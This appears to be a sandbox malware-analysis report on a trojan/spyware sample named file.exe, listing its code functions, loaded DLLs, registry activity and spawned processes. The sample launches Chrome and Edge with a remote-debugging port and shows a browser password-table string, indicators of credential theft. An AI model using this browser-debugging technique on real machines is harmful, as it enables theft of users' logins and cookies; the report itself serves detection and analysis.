Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409641	0_2_00409641
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407611	0_2_00407611
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406621	0_2_00406621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004056D1	0_2_004056D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C6E1	0_2_0040C6E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004046E1	0_2_004046E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D681	0_2_0040D681
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043C681	0_2_0043C681
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B6A1	0_2_0040B6A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A741	0_2_0040A741
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B741	0_2_0040B741
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406761	0_2_00406761
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405771	0_2_00405771
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409711	0_2_00409711
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407711	0_2_00407711
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408731	0_2_00408731
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004397D1	0_2_004397D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004087E1	0_2_004087E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004097E1	0_2_004097E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A7E1	0_2_0040A7E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B7F1	0_2_0040B7F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404781	0_2_00404781
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E7A1	0_2_0040E7A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004077B1	0_2_004077B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E841	0_2_0040E841
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405861	0_2_00405861
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404871	0_2_00404871
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C801	0_2_0040C801
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406801	0_2_00406801
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A8F1	0_2_0040A8F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407891	0_2_00407891
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B8A1	0_2_0040B8A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004098B1	0_2_004098B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406941	0_2_00406941
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E951	0_2_0040E951
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D971	0_2_0040D971
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B971	0_2_0040B971
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408911	0_2_00408911
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404921	0_2_00404921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405921	0_2_00405921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C921	0_2_0040C921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F931	0_2_0041F931
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B931	0_2_0043B931
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004059D1	0_2_004059D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041C981	0_2_0041C981
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A9A1	0_2_0040A9A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CA51	0_2_0040CA51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406A61	0_2_00406A61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405A71	0_2_00405A71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AA71	0_2_0040AA71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041FA01	0_2_0041FA01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040FA01	0_2_0040FA01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CA01	0_2_0043CA01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404A11	0_2_00404A11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401A28	0_2_00401A28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408A31	0_2_00408A31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CAD1	0_2_0043CAD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409AF1	0_2_00409AF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DA81	0_2_0040DA81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407A91	0_2_00407A91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042DB61	0_2_0042DB61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041EB71	0_2_0041EB71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403B01	0_2_00403B01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405B11	0_2_00405B11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408B21	0_2_00408B21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401B28	0_2_00401B28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AB31	0_2_0040AB31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404B31	0_2_00404B31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BB31	0_2_0043BB31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403BC1	0_2_00403BC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404BC1	0_2_00404BC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426BD1	0_2_00426BD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DBE1	0_2_0040DBE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407BF1	0_2_00407BF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406B81	0_2_00406B81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CBA1	0_2_0040CBA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EBA1	0_2_0040EBA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CBA1	0_2_0043CBA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042EBA1	0_2_0042EBA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BBB1	0_2_0040BBB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409BB1	0_2_00409BB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CC41	0_2_0040CC41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00439C51	0_2_00439C51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CC61	0_2_0043CC61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406C71	0_2_00406C71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BC71	0_2_0040BC71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426C71	0_2_00426C71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405C21	0_2_00405C21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408C21	0_2_00408C21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EC31	0_2_0040EC31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043ECC1	0_2_0043ECC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404CE1	0_2_00404CE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403C81	0_2_00403C81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409CA1	0_2_00409CA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BCA1	0_2_0043BCA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407CB1	0_2_00407CB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00420CB1	0_2_00420CB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BD51	0_2_0040BD51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042DD51	0_2_0042DD51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409D61	0_2_00409D61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ED01	0_2_0041ED01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406D01	0_2_00406D01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CD01	0_2_0040CD01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DD01	0_2_0040DD01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040ED01	0_2_0040ED01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CD01	0_2_0043CD01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405D11	0_2_00405D11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408D31	0_2_00408D31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426D31	0_2_00426D31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407DD1	0_2_00407DD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DDD1	0_2_0040DDD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426DD1	0_2_00426DD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CDE1	0_2_0043CDE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406DF1	0_2_00406DF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403DA1	0_2_00403DA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CDA1	0_2_0040CDA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BDB1	0_2_0043BDB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CE41	0_2_0040CE41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BE71	0_2_0043BE71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AE01	0_2_0040AE01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404E01	0_2_00404E01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408E01	0_2_00408E01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405E11	0_2_00405E11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403E31	0_2_00403E31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409ED1	0_2_00409ED1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403ED1	0_2_00403ED1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BEE1	0_2_0040BEE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406E91	0_2_00406E91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00429E91	0_2_00429E91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041AEA1	0_2_0041AEA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DEA1	0_2_0040DEA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408EB1	0_2_00408EB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CEB1	0_2_0043CEB1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041EF51	0_2_0041EF51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00425F52	0_2_00425F52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CF51	0_2_0043CF51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040CF61	0_2_0040CF61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F61	0_2_00408F61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409F71	0_2_00409F71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EF01	0_2_0040EF01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405F01	0_2_00405F01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043BF11	0_2_0043BF11
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406F31	0_2_00406F31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404F31	0_2_00404F31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405FC1	0_2_00405FC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EFE1	0_2_0040EFE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407F91	0_2_00407F91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00429F91	0_2_00429F91
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041CFA1	0_2_0041CFA1

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@62/313@24/24

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00430375 CreateToolhelp32Snapshot,Process32First,

0_2_00430375

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\616HGZK7.htm

Jump to behavior

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\2fbdac59-51ed-441a-a225-6085d89135a6.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AAKKFHCFI.0.dr, FHIDAKFIJ.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 54%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2220,i,4289607260128770584,8456024223546190286,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2308,i,9625415575329100081,14063141058506753457,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6848 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2220,i,4289607260128770584,8456024223546190286,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2308,i,9625415575329100081,14063141058506753457,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6848 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: file.exe

Static PE information: section name: .00cfg

Source: file.exe

Static PE information: section name: .text entropy: 6.827864387265423

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
